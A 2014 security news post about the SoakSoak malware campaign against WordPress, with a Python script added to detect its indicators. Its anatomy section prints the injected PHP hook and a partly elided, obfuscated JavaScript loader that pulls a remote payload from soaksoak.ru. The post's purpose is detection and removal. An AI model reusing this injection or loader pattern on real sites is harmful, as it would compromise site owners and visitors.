15/12/2014

New SoakSoak Malware Compromises Over 100,000+ WordPress Websites

Users of WordPress, a free and open source blogging tool and content management system (CMS), are being informed of a widespread malware campaign that has already compromised more than 100,000 websites worldwide, and still counting.
Earlier Sunday morning, news broke throughout the WordPress community regarding a widespread malware attack that has already compromised over 100,000 websites and counting. The campaign is served from SoakSoak.ru, hence the name ‘SoakSoak malware’. Those affected may be experiencing erratic site behaviour, including unexpected redirects to SoakSoak.ru web pages along with the potential for automatic downloads of malicious files to visitors’ computers without consent. Google has already been on top of this infection and has added over 11,000 websites to its blacklist, which could have a serious effect on the revenue of those site owners.

The infections aren’t targeted strictly at WordPress sites, but it appears this is the largest platform that has been infected. According to Sucuri, a WordPress security service, the exact method of intrusion has not been pinpointed at this time, although several signals led them to believe many WordPress users could have fallen victim to a recent vulnerability in the premium Slider Revolution plugin. If you’re a site owner worried about the potential risk of infection to your own website, head over to the free SiteCheck scanner to see whether you are in the clear or whether the malware has already burrowed its way into your site.
How to remove SoakSoak malware
(Sucuri – SoakSoak – SiteCheck)

SoakSoak Malware Anatomy
It modifies the file wp-includes/template-loader.php and injects this content:
<?php
// Injected by the malware: registers a hook on wp_enqueue_scripts so that the
// "swfobject" script handle is enqueued on every page load of the site.
function FuncQueueObject()
{
    wp_enqueue_script("swfobject");
}
add_action("wp_enqueue_scripts", 'FuncQueueObject');
This causes wp-includes/js/swfobject.js to be loaded on every page of the site, and that file now includes the malware shown here:
// The percent-encoded string is decoded at run time and evaluated. Decoded, the
// portion visible here reads (the part elided on this page is not shown):
//   ( function() { ...ript.id='xxyyzz_petushok'; head.appendChild(script); }() );
eval(decodeURIComponent("%28%0D%0A%66%75%6E%63%74%69%6F%6E%28%29%0D%0A%7B%0D%..72%69%70%74%2E%69%64%3D%27%78%78%79%79%7A%7A%5F%70%65%74%75%73%68%6F%6B%27%3B%0D%0A%09%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0D%0A%7D%28%29%0D%0A%29%3B"));
When decoded, this script appends a script element to the page head that loads a further JavaScript payload from the soaksoak.ru domain, specifically this file:
hxxp://soaksoak.ru/xteas/code
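As an added example (not part of the original post and not Sucuri's tooling), a small Python checker for the two indicators described in this section: the injected hook in wp-includes/template-loader.php and the eval(decodeURIComponent(...)) wrapper in wp-includes/js/swfobject.js, whose payload it decodes so the strings it references can be inspected. The file paths are the ones named above; the function names and the indicator list are my own choices.

```python
import re
import sys
import urllib.parse
from pathlib import Path

# Indicators taken from the injected code shown in this post.
PHP_MARKERS = ("FuncQueueObject", 'wp_enqueue_script("swfobject")')
JS_EVAL_RE = re.compile(r'eval\(\s*decodeURIComponent\s*\(\s*"([^"]*)"')
DECODED_MARKERS = ("soaksoak.ru", "appendChild(script)", "_petushok")


def decode_payloads(js_source):
    """Return the decoded string of every eval(decodeURIComponent("...")) call."""
    return [urllib.parse.unquote(m.group(1)) for m in JS_EVAL_RE.finditer(js_source)]


def scan_wordpress(root):
    """Scan a WordPress install; an empty list means no known indicator matched."""
    root = Path(root)
    findings = []

    loader = root / "wp-includes" / "template-loader.php"
    if loader.is_file():
        src = loader.read_text(errors="replace")
        for marker in PHP_MARKERS:
            if marker in src:
                findings.append(f"{loader}: injected marker {marker!r}")

    swf = root / "wp-includes" / "js" / "swfobject.js"
    if swf.is_file():
        src = swf.read_text(errors="replace")
        for decoded in decode_payloads(src):
            hits = [m for m in DECODED_MARKERS if m in decoded]
            if hits:
                findings.append(f"{swf}: eval(decodeURIComponent) payload references {hits}")
            else:
                # An eval of encoded text is unusual in this file; surface it for review.
                findings.append(f"{swf}: eval(decodeURIComponent) present, inspect manually")
    return findings


if __name__ == "__main__":
    results = scan_wordpress(sys.argv[1] if len(sys.argv) > 1 else ".")
    print("\n".join(results) if results else "no SoakSoak indicators found")
```

Run it with the WordPress root directory as the only argument; a clean install prints nothing but the "no indicators" line.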

How to Remove SoakSoak Malware?
Currently there is no confirmed removal procedure. However, we have listed some steps to bring it down.
1. If you have installed a theme, template, or any plugin from SoakSoak.ru, remove it immediately.
2. If you host your WordPress site with another hosting service, check all your files there and look for the codes mentioned above that cause the infection.
3. If you believe you have never visited SoakSoak.ru but are observing unfamiliar behaviour on your WordPress site, log in to your site, expand the widget template, look for the codes mentioned above and remove them.
4. When you have finished steps 1, 2 and 3, go back to the free SiteCheck scanner and scan again to confirm whether your site is clean.